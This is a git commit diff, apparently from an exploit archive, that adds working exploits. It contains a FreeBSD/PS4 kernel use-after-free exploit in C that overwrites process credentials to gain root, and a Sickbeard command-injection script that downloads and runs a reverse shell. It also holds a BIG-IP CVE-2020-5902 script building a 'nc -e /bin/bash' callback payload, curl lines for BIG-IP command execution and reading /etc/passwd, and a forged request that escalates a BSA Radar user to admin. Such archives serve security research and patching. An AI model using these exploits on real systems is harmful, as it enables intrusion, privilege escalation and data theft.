DB: 2020-07-08
8 changes to exploits/shellcodes Sony Playstation 4 (PS4) < 7.02 / FreeBSD 9 / FreeBSD 12 - 'ip6_setpktopt' Kernel Local Privilege Escalation (PoC) Microsoft Windows mshta.exe 2019 - XML External Entity Injection BIG-IP 15.0.0 < 15.1.0.3 / 14.1.0 < 14.1.2.5 / 13.1.0 < 13.1.3.3 / 12.1.0 < 12.1.5.1 / 11.6.1 < 11.6.5.1 - Traffic Management User Interface 'TMUI' Remote Code Execution BIG-IP 15.0.0 < 15.1.0.3 / 14.1.0 < 14.1.2.5 / 13.1.0 < 13.1.3.3 / 12.1.0 < 12.1.5.1 / 11.6.1 < 11.6.5.1 - Traffic Management User Interface 'TMUI' Remote Code Execution (PoC) Sickbeard 0.1 - Remote Command Injection Online Shopping Portal 3.1 - 'email' SQL Injection Joomla! J2 JOBS 1.3.0 - 'sortby' Authenticated SQL Injection BSA Radar 1.6.7234.24750 - Authenticated Privilege Escalation
This commit is contained in:
parent
1bc852d2af
commit
8f6367cf98
9 changed files with 998 additions and 0 deletions
610
exploits/hardware/local/48644.c
Normal file
610
exploits/hardware/local/48644.c
Normal file
|
@ -0,0 +1,610 @@
|
|||
/*
|
||||
FreeBSD 12.0-RELEASE x64 Kernel Exploit
|
||||
|
||||
Usage:
|
||||
$ clang -o exploit exploit.c -lpthread
|
||||
$ ./exploit
|
||||
*/
|
||||
|
||||
#include <errno.h>
|
||||
#include <fcntl.h>
|
||||
#include <stdio.h>
|
||||
#include <string.h>
|
||||
#include <stddef.h>
|
||||
#include <stdlib.h>
|
||||
#include <unistd.h>
|
||||
#include <pthread.h>
|
||||
#define _KERNEL
|
||||
#include <sys/event.h>
|
||||
#undef _KERNEL
|
||||
#define _WANT_FILE
|
||||
#include <sys/file.h>
|
||||
#include <sys/filedesc.h>
|
||||
#include <sys/param.h>
|
||||
#include <sys/proc.h>
|
||||
#include <sys/socket.h>
|
||||
#define _WANT_SOCKET
|
||||
#include <sys/socketvar.h>
|
||||
#include <netinet/in.h>
|
||||
#define _WANT_INPCB
|
||||
#include <netinet/in_pcb.h>
|
||||
#include <netinet/ip6.h>
|
||||
#include <netinet6/ip6_var.h>
|
||||
|
||||
// #define FBSD12
|
||||
|
||||
#define ELF_MAGIC 0x464c457f
|
||||
|
||||
#define IPV6_2292PKTINFO 19
|
||||
#define IPV6_2292PKTOPTIONS 25
|
||||
|
||||
#define TCLASS_MASTER 0x13370000
|
||||
#define TCLASS_SPRAY 0x41
|
||||
#define TCLASS_TAINT 0x42
|
||||
|
||||
#define NUM_SPRAY_RACE 0x20
|
||||
#define NUM_SPRAY 0x100
|
||||
#define NUM_KQUEUES 0x100
|
||||
|
||||
#ifdef FBSD12
|
||||
#define ALLPROC_OFFSET 0x1df3c38
|
||||
#else
|
||||
#define ALLPROC_OFFSET 0xf01e40
|
||||
#endif
|
||||
|
||||
#define PKTOPTS_PKTINFO_OFFSET (offsetof(struct ip6_pktopts, ip6po_pktinfo))
|
||||
#define PKTOPTS_RTHDR_OFFSET (offsetof(struct ip6_pktopts, ip6po_rhinfo.ip6po_rhi_rthdr))
|
||||
#define PKTOPTS_TCLASS_OFFSET (offsetof(struct ip6_pktopts, ip6po_tclass))
|
||||
|
||||
#define PROC_LIST_OFFSET (offsetof(struct proc, p_list))
|
||||
#define PROC_UCRED_OFFSET (offsetof(struct proc, p_ucred))
|
||||
#define PROC_FD_OFFSET (offsetof(struct proc, p_fd))
|
||||
#define PROC_PID_OFFSET (offsetof(struct proc, p_pid))
|
||||
|
||||
#ifdef FBSD12
|
||||
|
||||
#define FILEDESC_FILES_OFFSET (offsetof(struct filedesc, fd_files))
|
||||
#define FILEDESCENTTBL_OFILES_OFFSET (offsetof(struct fdescenttbl, fdt_ofiles))
|
||||
#define FILEDESCENTTBL_NFILES_OFFSET (offsetof(struct fdescenttbl, fdt_nfiles))
|
||||
#define FILEDESCENT_FILE_OFFSET (offsetof(struct filedescent, fde_file))
|
||||
#define FILE_TYPE_OFFSET (offsetof(struct file, f_type))
|
||||
#define FILE_DATA_OFFSET (offsetof(struct file, f_data))
|
||||
|
||||
#else
|
||||
|
||||
#define FILEDESC_OFILES_OFFSET (offsetof(struct filedesc, fd_ofiles))
|
||||
#define FILEDESC_NFILES_OFFSET (offsetof(struct filedesc, fd_nfiles))
|
||||
#define FILE_TYPE_OFFSET (offsetof(struct file, f_type))
|
||||
#define FILE_DATA_OFFSET (offsetof(struct file, f_data))
|
||||
|
||||
#endif
|
||||
|
||||
#define KNOTE_FOP_OFFSET (offsetof(struct knote, kn_fop))
|
||||
#define FILTEROPS_DETACH_OFFSET (offsetof(struct filterops, f_detach))
|
||||
|
||||
#define SOCKET_PCB_OFFSET (offsetof(struct socket, so_pcb))
|
||||
#define INPCB_OUTPUTOPTS_OFFSET (offsetof(struct inpcb, in6p_outputopts))
|
||||
|
||||
int kqueue(void);
|
||||
int kevent(int kq, const struct kevent *changelist, int nchanges,
|
||||
struct kevent *eventlist, int nevents,
|
||||
const struct timespec *timeout);
|
||||
|
||||
static uint64_t kernel_base;
|
||||
static uint64_t p_ucred, p_fd;
|
||||
static uint64_t kevent_addr, pktopts_addr;
|
||||
|
||||
static int triggered = 0;
|
||||
static int kevent_sock, master_sock, overlap_sock, victim_sock;
|
||||
static int spray_sock[NUM_SPRAY];
|
||||
static int kq[NUM_KQUEUES];
|
||||
|
||||
static void hexDump(const void *data, size_t size) {
|
||||
size_t i;
|
||||
for(i = 0; i < size; i++) {
|
||||
printf("%02hhX%c", ((char *)data)[i], (i + 1) % 16 ? ' ' : '\n');
|
||||
}
|
||||
printf("\n");
|
||||
}
|
||||
|
||||
static int new_socket(void) {
|
||||
return socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);
|
||||
}
|
||||
|
||||
static void build_tclass_cmsg(char *buf, int val) {
|
||||
struct cmsghdr *cmsg;
|
||||
|
||||
cmsg = (struct cmsghdr *)buf;
|
||||
cmsg->cmsg_len = CMSG_LEN(sizeof(int));
|
||||
cmsg->cmsg_level = IPPROTO_IPV6;
|
||||
cmsg->cmsg_type = IPV6_TCLASS;
|
||||
|
||||
*(int *)CMSG_DATA(cmsg) = val;
|
||||
}
|
||||
|
||||
static int build_rthdr_msg(char *buf, int size) {
|
||||
struct ip6_rthdr *rthdr;
|
||||
int len;
|
||||
|
||||
len = ((size >> 3) - 1) & ~1;
|
||||
size = (len + 1) << 3;
|
||||
|
||||
memset(buf, 0, size);
|
||||
|
||||
rthdr = (struct ip6_rthdr *)buf;
|
||||
rthdr->ip6r_nxt = 0;
|
||||
rthdr->ip6r_len = len;
|
||||
rthdr->ip6r_type = IPV6_RTHDR_TYPE_0;
|
||||
rthdr->ip6r_segleft = rthdr->ip6r_len >> 1;
|
||||
|
||||
return size;
|
||||
}
|
||||
|
||||
static int get_rthdr(int s, char *buf, socklen_t len) {
|
||||
return getsockopt(s, IPPROTO_IPV6, IPV6_RTHDR, buf, &len);
|
||||
}
|
||||
|
||||
static int set_rthdr(int s, char *buf, socklen_t len) {
|
||||
return setsockopt(s, IPPROTO_IPV6, IPV6_RTHDR, buf, len);
|
||||
}
|
||||
|
||||
static int free_rthdr(int s) {
|
||||
return set_rthdr(s, NULL, 0);
|
||||
}
|
||||
|
||||
static int get_tclass(int s) {
|
||||
int val;
|
||||
socklen_t len = sizeof(val);
|
||||
getsockopt(s, IPPROTO_IPV6, IPV6_TCLASS, &val, &len);
|
||||
return val;
|
||||
}
|
||||
|
||||
static int set_tclass(int s, int val) {
|
||||
return setsockopt(s, IPPROTO_IPV6, IPV6_TCLASS, &val, sizeof(val));
|
||||
}
|
||||
|
||||
static int get_pktinfo(int s, char *buf) {
|
||||
socklen_t len = sizeof(struct in6_pktinfo);
|
||||
return getsockopt(s, IPPROTO_IPV6, IPV6_PKTINFO, buf, &len);
|
||||
}
|
||||
|
||||
static int set_pktinfo(int s, char *buf) {
|
||||
return setsockopt(s, IPPROTO_IPV6, IPV6_PKTINFO, buf, sizeof(struct in6_pktinfo));
|
||||
}
|
||||
|
||||
static int set_pktopts(int s, char *buf, socklen_t len) {
|
||||
return setsockopt(s, IPPROTO_IPV6, IPV6_2292PKTOPTIONS, buf, len);
|
||||
}
|
||||
|
||||
static int free_pktopts(int s) {
|
||||
return set_pktopts(s, NULL, 0);
|
||||
}
|
||||
|
||||
static uint64_t leak_rthdr_ptr(int s) {
|
||||
char buf[0x100];
|
||||
get_rthdr(s, buf, sizeof(buf));
|
||||
return *(uint64_t *)(buf + PKTOPTS_RTHDR_OFFSET);
|
||||
}
|
||||
|
||||
static uint64_t leak_kmalloc(char *buf, int size) {
|
||||
int rthdr_len = build_rthdr_msg(buf, size);
|
||||
set_rthdr(master_sock, buf, rthdr_len);
|
||||
#ifdef FBSD12
|
||||
get_rthdr(master_sock, buf, rthdr_len);
|
||||
return *(uint64_t *)(buf + 0x00);
|
||||
#else
|
||||
return leak_rthdr_ptr(overlap_sock);
|
||||
#endif
|
||||
}
|
||||
|
||||
static void write_to_victim(uint64_t addr) {
|
||||
char buf[sizeof(struct in6_pktinfo)];
|
||||
*(uint64_t *)(buf + 0x00) = addr;
|
||||
*(uint64_t *)(buf + 0x08) = 0;
|
||||
*(uint32_t *)(buf + 0x10) = 0;
|
||||
set_pktinfo(master_sock, buf);
|
||||
}
|
||||
|
||||
static int find_victim_sock(void) {
|
||||
char buf[sizeof(struct in6_pktinfo)];
|
||||
|
||||
write_to_victim(pktopts_addr + PKTOPTS_PKTINFO_OFFSET);
|
||||
|
||||
for (int i = 0; i < NUM_SPRAY; i++) {
|
||||
get_pktinfo(spray_sock[i], buf);
|
||||
if (*(uint64_t *)(buf + 0x00) != 0)
|
||||
return i;
|
||||
}
|
||||
|
||||
return -1;
|
||||
}
|
||||
|
||||
static uint8_t kread8(uint64_t addr) {
|
||||
char buf[sizeof(struct in6_pktinfo)];
|
||||
write_to_victim(addr);
|
||||
get_pktinfo(victim_sock, buf);
|
||||
return *(uint8_t *)buf;
|
||||
}
|
||||
|
||||
static uint16_t kread16(uint64_t addr) {
|
||||
char buf[sizeof(struct in6_pktinfo)];
|
||||
write_to_victim(addr);
|
||||
get_pktinfo(victim_sock, buf);
|
||||
return *(uint16_t *)buf;
|
||||
}
|
||||
|
||||
static uint32_t kread32(uint64_t addr) {
|
||||
char buf[sizeof(struct in6_pktinfo)];
|
||||
write_to_victim(addr);
|
||||
get_pktinfo(victim_sock, buf);
|
||||
return *(uint32_t *)buf;
|
||||
}
|
||||
|
||||
static uint64_t kread64(uint64_t addr) {
|
||||
char buf[sizeof(struct in6_pktinfo)];
|
||||
write_to_victim(addr);
|
||||
get_pktinfo(victim_sock, buf);
|
||||
return *(uint64_t *)buf;
|
||||
}
|
||||
|
||||
static void kread(void *dst, uint64_t src, size_t len) {
|
||||
for (int i = 0; i < len; i++)
|
||||
((uint8_t *)dst)[i] = kread8(src + i);
|
||||
}
|
||||
|
||||
static void kwrite64(uint64_t addr, uint64_t val) {
|
||||
int fd = open("/dev/kmem", O_RDWR);
|
||||
if (fd >= 0) {
|
||||
lseek(fd, addr, SEEK_SET);
|
||||
write(fd, &val, sizeof(val));
|
||||
close(fd);
|
||||
}
|
||||
}
|
||||
|
||||
static int kwrite(uint64_t addr, void *buf) {
|
||||
write_to_victim(addr);
|
||||
return set_pktinfo(victim_sock, buf);
|
||||
}
|
||||
|
||||
static uint64_t find_kernel_base(uint64_t addr) {
|
||||
addr &= ~(PAGE_SIZE - 1);
|
||||
while (kread32(addr) != ELF_MAGIC)
|
||||
addr -= PAGE_SIZE;
|
||||
return addr;
|
||||
}
|
||||
|
||||
static int find_proc_cred_and_fd(pid_t pid) {
|
||||
uint64_t proc = kread64(kernel_base + ALLPROC_OFFSET);
|
||||
|
||||
while (proc) {
|
||||
if (kread32(proc + PROC_PID_OFFSET) == pid) {
|
||||
p_ucred = kread64(proc + PROC_UCRED_OFFSET);
|
||||
p_fd = kread64(proc + PROC_FD_OFFSET);
|
||||
printf("[+] p_ucred: 0x%lx\n", p_ucred);
|
||||
printf("[+] p_fd: 0x%lx\n", p_fd);
|
||||
return 0;
|
||||
}
|
||||
|
||||
proc = kread64(proc + PROC_LIST_OFFSET);
|
||||
}
|
||||
|
||||
return -1;
|
||||
}
|
||||
|
||||
#ifdef FBSD12
|
||||
|
||||
static uint64_t find_socket_data(int s) {
|
||||
uint64_t files, ofiles, fp;
|
||||
int nfiles;
|
||||
short type;
|
||||
|
||||
files = kread64(p_fd + FILEDESC_FILES_OFFSET);
|
||||
if (!files)
|
||||
return 0;
|
||||
|
||||
ofiles = files + FILEDESCENTTBL_OFILES_OFFSET;
|
||||
|
||||
nfiles = kread32(files + FILEDESCENTTBL_NFILES_OFFSET);
|
||||
if (s < 0 || s >= nfiles)
|
||||
return 0;
|
||||
|
||||
fp = kread64(ofiles + s * sizeof(struct filedescent) + FILEDESCENT_FILE_OFFSET);
|
||||
if (!fp)
|
||||
return 0;
|
||||
|
||||
type = kread16(fp + FILE_TYPE_OFFSET);
|
||||
if (type != DTYPE_SOCKET)
|
||||
return 0;
|
||||
|
||||
return kread64(fp + FILE_DATA_OFFSET);
|
||||
}
|
||||
|
||||
#else
|
||||
|
||||
static uint64_t find_socket_data(int s) {
|
||||
uint64_t ofiles, fp;
|
||||
int nfiles;
|
||||
short type;
|
||||
|
||||
ofiles = kread64(p_fd + FILEDESC_OFILES_OFFSET);
|
||||
if (!ofiles)
|
||||
return 0;
|
||||
|
||||
nfiles = kread32(p_fd + FILEDESC_NFILES_OFFSET);
|
||||
if (s < 0 || s >= nfiles)
|
||||
return 0;
|
||||
|
||||
fp = kread64(ofiles + s * sizeof(struct file *));
|
||||
if (!fp)
|
||||
return 0;
|
||||
|
||||
type = kread16(fp + FILE_TYPE_OFFSET);
|
||||
if (type != DTYPE_SOCKET)
|
||||
return 0;
|
||||
|
||||
return kread64(fp + FILE_DATA_OFFSET);
|
||||
}
|
||||
|
||||
#endif
|
||||
|
||||
static uint64_t find_socket_pcb(int s) {
|
||||
uint64_t f_data;
|
||||
|
||||
f_data = find_socket_data(s);
|
||||
if (!f_data)
|
||||
return 0;
|
||||
|
||||
return kread64(f_data + SOCKET_PCB_OFFSET);
|
||||
}
|
||||
|
||||
static uint64_t find_socket_pktopts(int s) {
|
||||
uint64_t in6p;
|
||||
|
||||
in6p = find_socket_pcb(s);
|
||||
if (!in6p)
|
||||
return 0;
|
||||
|
||||
return kread64(in6p + INPCB_OUTPUTOPTS_OFFSET);
|
||||
}
|
||||
|
||||
static void cleanup(void) {
|
||||
uint64_t master_pktopts, overlap_pktopts, victim_pktopts;
|
||||
|
||||
master_pktopts = find_socket_pktopts(master_sock);
|
||||
overlap_pktopts = find_socket_pktopts(overlap_sock);
|
||||
victim_pktopts = find_socket_pktopts(victim_sock);
|
||||
|
||||
kwrite64(master_pktopts + PKTOPTS_PKTINFO_OFFSET, 0);
|
||||
kwrite64(overlap_pktopts + PKTOPTS_RTHDR_OFFSET, 0);
|
||||
kwrite64(victim_pktopts + PKTOPTS_PKTINFO_OFFSET, 0);
|
||||
}
|
||||
|
||||
static void escalate_privileges(void) {
|
||||
char buf[sizeof(struct in6_pktinfo)];
|
||||
|
||||
*(uint32_t *)(buf + 0x00) = 0; // cr_uid
|
||||
*(uint32_t *)(buf + 0x04) = 0; // cr_ruid
|
||||
*(uint32_t *)(buf + 0x08) = 0; // cr_svuid
|
||||
*(uint32_t *)(buf + 0x0c) = 1; // cr_ngroups
|
||||
*(uint32_t *)(buf + 0x10) = 0; // cr_rgid
|
||||
|
||||
kwrite(p_ucred + 4, buf);
|
||||
}
|
||||
|
||||
static int find_overlap_sock(void) {
|
||||
set_tclass(master_sock, TCLASS_TAINT);
|
||||
|
||||
for (int i = 0; i < NUM_SPRAY; i++) {
|
||||
if (get_tclass(spray_sock[i]) == TCLASS_TAINT)
|
||||
return i;
|
||||
}
|
||||
|
||||
return -1;
|
||||
}
|
||||
|
||||
static int spray_pktopts(void) {
|
||||
for (int i = 0; i < NUM_SPRAY_RACE; i++)
|
||||
set_tclass(spray_sock[i], TCLASS_SPRAY);
|
||||
|
||||
if (get_tclass(master_sock) == TCLASS_SPRAY)
|
||||
return 1;
|
||||
|
||||
for (int i = 0; i < NUM_SPRAY_RACE; i++)
|
||||
free_pktopts(spray_sock[i]);
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
static void *use_thread(void *arg) {
|
||||
char buf[CMSG_SPACE(sizeof(int))];
|
||||
build_tclass_cmsg(buf, 0);
|
||||
|
||||
while (!triggered && get_tclass(master_sock) != TCLASS_SPRAY) {
|
||||
set_pktopts(master_sock, buf, sizeof(buf));
|
||||
|
||||
#ifdef FBSD12
|
||||
usleep(100);
|
||||
#endif
|
||||
}
|
||||
|
||||
triggered = 1;
|
||||
return NULL;
|
||||
}
|
||||
|
||||
static void *free_thread(void *arg) {
|
||||
while (!triggered && get_tclass(master_sock) != TCLASS_SPRAY) {
|
||||
free_pktopts(master_sock);
|
||||
|
||||
#ifdef FBSD12
|
||||
if (spray_pktopts())
|
||||
break;
|
||||
#endif
|
||||
|
||||
usleep(100);
|
||||
}
|
||||
|
||||
triggered = 1;
|
||||
return NULL;
|
||||
}
|
||||
|
||||
static int trigger_uaf(void) {
|
||||
pthread_t th[2];
|
||||
|
||||
pthread_create(&th[0], NULL, use_thread, NULL);
|
||||
pthread_create(&th[1], NULL, free_thread, NULL);
|
||||
|
||||
while (1) {
|
||||
if (spray_pktopts())
|
||||
break;
|
||||
|
||||
#ifndef FBSD12
|
||||
usleep(100);
|
||||
#endif
|
||||
}
|
||||
|
||||
triggered = 1;
|
||||
|
||||
pthread_join(th[0], NULL);
|
||||
pthread_join(th[1], NULL);
|
||||
|
||||
return find_overlap_sock();
|
||||
}
|
||||
|
||||
static int fake_pktopts(uint64_t pktinfo) {
|
||||
char buf[0x100];
|
||||
int rthdr_len, tclass;
|
||||
|
||||
// Free master_sock's pktopts
|
||||
free_pktopts(overlap_sock);
|
||||
|
||||
// Spray rthdr's to refill master_sock's pktopts
|
||||
rthdr_len = build_rthdr_msg(buf, 0x100);
|
||||
for (int i = 0; i < NUM_SPRAY; i++) {
|
||||
*(uint64_t *)(buf + PKTOPTS_PKTINFO_OFFSET) = pktinfo;
|
||||
*(uint32_t *)(buf + PKTOPTS_TCLASS_OFFSET) = TCLASS_MASTER | i;
|
||||
set_rthdr(spray_sock[i], buf, rthdr_len);
|
||||
}
|
||||
|
||||
tclass = get_tclass(master_sock);
|
||||
|
||||
// See if pktopts has been refilled correctly
|
||||
if ((tclass & 0xffff0000) != TCLASS_MASTER) {
|
||||
printf("[-] Error could not refill pktopts.\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
return tclass & 0xffff;
|
||||
}
|
||||
|
||||
static void leak_kevent_pktopts(void) {
|
||||
char buf[0x800];
|
||||
|
||||
struct kevent kv;
|
||||
EV_SET(&kv, kevent_sock, EVFILT_READ, EV_ADD, 0, 5, NULL);
|
||||
|
||||
// Free pktopts
|
||||
for (int i = 0; i < NUM_SPRAY; i++)
|
||||
free_pktopts(spray_sock[i]);
|
||||
|
||||
// Leak 0x800 kmalloc addr
|
||||
kevent_addr = leak_kmalloc(buf, 0x800);
|
||||
printf("[+] kevent_addr: 0x%lx\n", kevent_addr);
|
||||
|
||||
// Free rthdr buffer and spray kevents to occupy this location
|
||||
free_rthdr(master_sock);
|
||||
for (int i = 0; i < NUM_KQUEUES; i++)
|
||||
kevent(kq[i], &kv, 1, 0, 0, 0);
|
||||
|
||||
// Leak 0x100 kmalloc addr
|
||||
pktopts_addr = leak_kmalloc(buf, 0x100);
|
||||
printf("[+] pktopts_addr: 0x%lx\n", pktopts_addr);
|
||||
|
||||
// Free rthdr buffer and spray pktopts to occupy this location
|
||||
free_rthdr(master_sock);
|
||||
for (int i = 0; i < NUM_SPRAY; i++)
|
||||
set_tclass(spray_sock[i], 0);
|
||||
}
|
||||
|
||||
int main(int argc, char *argv[]) {
|
||||
uint64_t knote, kn_fop, f_detach;
|
||||
int idx;
|
||||
|
||||
printf("[*] Initializing sockets...\n");
|
||||
|
||||
kevent_sock = new_socket();
|
||||
master_sock = new_socket();
|
||||
|
||||
for (int i = 0; i < NUM_SPRAY; i++)
|
||||
spray_sock[i] = new_socket();
|
||||
|
||||
for (int i = 0; i < NUM_KQUEUES; i++)
|
||||
kq[i] = kqueue();
|
||||
|
||||
printf("[*] Triggering UAF...\n");
|
||||
idx = trigger_uaf();
|
||||
if (idx == -1) {
|
||||
printf("[-] Error could not find overlap sock.\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
// master_sock and overlap_sock point to the same pktopts
|
||||
overlap_sock = spray_sock[idx];
|
||||
spray_sock[idx] = new_socket();
|
||||
printf("[+] Overlap socket: %x (%x)\n", overlap_sock, idx);
|
||||
|
||||
// Reallocate pktopts
|
||||
for (int i = 0; i < NUM_SPRAY; i++) {
|
||||
free_pktopts(spray_sock[i]);
|
||||
set_tclass(spray_sock[i], 0);
|
||||
}
|
||||
|
||||
// Fake master pktopts
|
||||
idx = fake_pktopts(0);
|
||||
overlap_sock = spray_sock[idx];
|
||||
spray_sock[idx] = new_socket(); // use new socket so logic in spraying will be easier
|
||||
printf("[+] Overlap socket: %x (%x)\n", overlap_sock, idx);
|
||||
|
||||
// Leak address of some kevent and pktopts
|
||||
leak_kevent_pktopts();
|
||||
|
||||
// Fake master pktopts
|
||||
idx = fake_pktopts(pktopts_addr + PKTOPTS_PKTINFO_OFFSET);
|
||||
overlap_sock = spray_sock[idx];
|
||||
printf("[+] Overlap socket: %x (%x)\n", overlap_sock, idx);
|
||||
|
||||
idx = find_victim_sock();
|
||||
if (idx == -1) {
|
||||
printf("[-] Error could not find victim sock.\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
victim_sock = spray_sock[idx];
|
||||
printf("[+] Victim socket: %x (%x)\n", victim_sock, idx);
|
||||
|
||||
printf("[+] Arbitrary R/W achieved.\n");
|
||||
|
||||
knote = kread64(kevent_addr + kevent_sock * sizeof(uintptr_t));
|
||||
kn_fop = kread64(knote + KNOTE_FOP_OFFSET);
|
||||
f_detach = kread64(kn_fop + FILTEROPS_DETACH_OFFSET);
|
||||
|
||||
printf("[+] knote: 0x%lx\n", knote);
|
||||
printf("[+] kn_fop: 0x%lx\n", kn_fop);
|
||||
printf("[+] f_detach: 0x%lx\n", f_detach);
|
||||
|
||||
printf("[+] Finding kernel base...\n");
|
||||
kernel_base = find_kernel_base(f_detach);
|
||||
printf("[+] Kernel base: 0x%lx\n", kernel_base);
|
||||
|
||||
printf("[+] Finding process cred and fd...\n");
|
||||
find_proc_cred_and_fd(getpid());
|
||||
|
||||
printf("[*] Escalating privileges...\n");
|
||||
escalate_privileges();
|
||||
|
||||
printf("[*] Cleaning up...\n");
|
||||
cleanup();
|
||||
|
||||
printf("[+] Done.\n");
|
||||
|
||||
return 0;
|
||||
}
|
72
exploits/hardware/webapps/48646.py
Executable file
72
exploits/hardware/webapps/48646.py
Executable file
|
@ -0,0 +1,72 @@
|
|||
# Exploit Title: Sickbeard 0.1 - Remote Command Injection
|
||||
# Google Dork: https://www.shodan.io/search?query=sickbeard
|
||||
# Date: 2020-06-06
|
||||
# Exploit Author: bdrake
|
||||
# Vendor Homepage: https://sickbeard.com/
|
||||
# Software Link: https://github.com/midgetspy/Sick-Beard
|
||||
# Version: alpha (master) -- git : 31ceaf1b5cab1884a280fe3f4609bdc3b1fb3121
|
||||
# Tested on: Fedora 32
|
||||
# CVE : NA
|
||||
|
||||
#!/usr/bin/env python3
|
||||
|
||||
import requests
|
||||
import sys
|
||||
|
||||
HOST = 'http://localhost:8081/'
|
||||
|
||||
# path to local video for processing
|
||||
# see HOST + home/postprocess
|
||||
PROCESS_DIR = '/directory/changeme'
|
||||
|
||||
# Auth is disabled on default installation
|
||||
USERNAME = ''
|
||||
PASSWORD = ''
|
||||
|
||||
# see "Extra Scripts" field. HOST + config/hidden/
|
||||
# multiple commands can be entered separated by '|'
|
||||
CMD = 'wget -t 2 -T 1 -O /tmp/reverse_shell.py http://localhost/reverse_shell.py | python /tmp/reverse_shell.py'
|
||||
|
||||
|
||||
def post_request(url, data):
|
||||
try:
|
||||
requests.post(url=url, data=data, auth=(USERNAME, PASSWORD))
|
||||
except requests.exceptions.RequestException as e:
|
||||
print(repr(e))
|
||||
sys.exit(1)
|
||||
|
||||
|
||||
def set_extra_scripts():
|
||||
data = {
|
||||
'anon_redirect': 'http://dereferer.org/?',
|
||||
'display_all_seasons': 'on',
|
||||
'git_path': '',
|
||||
'extra_scripts': CMD
|
||||
}
|
||||
|
||||
post_request(HOST+'config/hidden/saveHidden', data)
|
||||
|
||||
|
||||
def process_episode():
|
||||
data = {
|
||||
'dir': PROCESS_DIR,
|
||||
'method': 'Manual',
|
||||
'force_replace': 'on'
|
||||
}
|
||||
|
||||
post_request(HOST+'home/postprocess/processEpisode', data)
|
||||
|
||||
|
||||
def main():
|
||||
try:
|
||||
print('setting scripts...')
|
||||
set_extra_scripts()
|
||||
|
||||
print('processing episode. might take a few seconds...')
|
||||
process_episode()
|
||||
except KeyboardInterrupt:
|
||||
print('exit...')
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
main()
|
62
exploits/linux/webapps/48642.sh
Executable file
62
exploits/linux/webapps/48642.sh
Executable file
|
@ -0,0 +1,62 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# EDB Note Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48642.zip
|
||||
#
|
||||
# Exploit Title: F5 BIG-IP Remote Code Execution
|
||||
# Date: 2020-07-06
|
||||
# Exploit Authors: Charles Dardaman of Critical Start, TeamARES
|
||||
# Rich Mirch of Critical Start, TeamARES
|
||||
# CVE: CVE-2020-5902
|
||||
#
|
||||
# Requirements:
|
||||
# Java JDK
|
||||
# hsqldb.jar 1.8
|
||||
# ysoserial https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar
|
||||
#
|
||||
|
||||
if [[ $# -ne 3 ]]
|
||||
then
|
||||
echo
|
||||
echo "Usage: $(basename $0) <server> <localip> <localport>"
|
||||
echo
|
||||
exit 1
|
||||
fi
|
||||
|
||||
server=${1?hostname argument required}
|
||||
localip=${2?Locaip argument required}
|
||||
port=${3?Port argument required}
|
||||
|
||||
if [[ ! -f $server.der ]]
|
||||
then
|
||||
echo "$server.der does not exist - extracting cert"
|
||||
openssl s_client \
|
||||
-showcerts \
|
||||
-servername $server \
|
||||
-connect $server:443 </dev/null 2>/dev/null | openssl x509 -outform DER >$server.der
|
||||
|
||||
keytool -import \
|
||||
-alias $server \
|
||||
-keystore keystore \
|
||||
-storepass changeit \
|
||||
-noprompt \
|
||||
-file $PWD/$server.der
|
||||
else
|
||||
echo "$server.der already exists. skipping extraction step"
|
||||
fi
|
||||
|
||||
java -jar ysoserial-master-SNAPSHOT.jar \
|
||||
CommonsCollections6 \
|
||||
"/bin/nc -e /bin/bash $localip $port" > nc.class
|
||||
|
||||
xxd -p nc.class | xargs | sed -e 's/ //g' | dd conv=ucase 2>/dev/null > payload.hex
|
||||
|
||||
if [[ ! -f f5RCE.class ]]
|
||||
then
|
||||
echo "Building exploit"
|
||||
javac -cp hsqldb.jar f5RCE.java
|
||||
fi
|
||||
|
||||
java -cp hsqldb.jar:. \
|
||||
-Djavax.net.ssl.trustStore=keystore \
|
||||
-Djavax.net.ssl.trustStorePassword=changeit \
|
||||
f5RCE $server payload.hex
|
7
exploits/linux/webapps/48643.txt
Normal file
7
exploits/linux/webapps/48643.txt
Normal file
|
@ -0,0 +1,7 @@
|
|||
## RCE:
|
||||
|
||||
curl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'
|
||||
|
||||
## Read File:
|
||||
|
||||
curl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
|
24
exploits/multiple/webapps/48649.txt
Normal file
24
exploits/multiple/webapps/48649.txt
Normal file
|
@ -0,0 +1,24 @@
|
|||
# Exploit Title: BSA Radar 1.6.7234.24750 - Authenticated Privilege Escalation
|
||||
# Date: 2020-07-06
|
||||
# Exploit Author: William Summerhill
|
||||
# Vendor homepage: https://www.globalradar.com/
|
||||
# Version: BSA Radar - Version 1.6.7234.24750 and lower
|
||||
# CVE-2020-14945 - Privilege Escalation
|
||||
Description: A privilege escalation vulnerability exists within Global RADAR BSA Radar 1.6.7234.X that allows an authenticated, low-privileged user to escalate their privileges to administrator rights (i.e. the "BankAdmin" role) via a forged request to the SaveUser API.
|
||||
|
||||
Proof of Concept:
|
||||
The privilege escalation is achieved by saving the response of the GetUser request (from clicking the username in the top right). When this profile is saved it will send a request to the SaveUserProfile endpoint. This response can be saved and modified (while updating it as needed to escalate privileges to BankAdmin role) then sent to the SaveUser endpoint which is the endpoint used for admins to update privileges of any user. After successful privilege escalation, a user can then access the Administration features and modify the application or accounts, cause further damage to the application and users, or exfiltrate application data.
|
||||
|
||||
HTTP Request PoC:
|
||||
POST /WS/AjaxWS.asmx/SaveUser
|
||||
|
||||
{"user":
|
||||
{"UserID":<CURRENT USER ID>,"Username":"...","Firstname":"...","Lastname":"...","Email":"...","BranchID":"...","Role":"BANKADMIN","WireLimit":"XXXXXXX","BankID":"...","Permissions":["XXXXXXXXXXXXXXX"], <REMAINDER OF REQUEST HERE> } }
|
||||
|
||||
The Role, WireLimit and Permissions parameters can be forged to forcefully change your current user permissions to elevate them to a higher role such as BankAdmin with full account modification permissions.
|
||||
|
||||
Tested on: Windows
|
||||
|
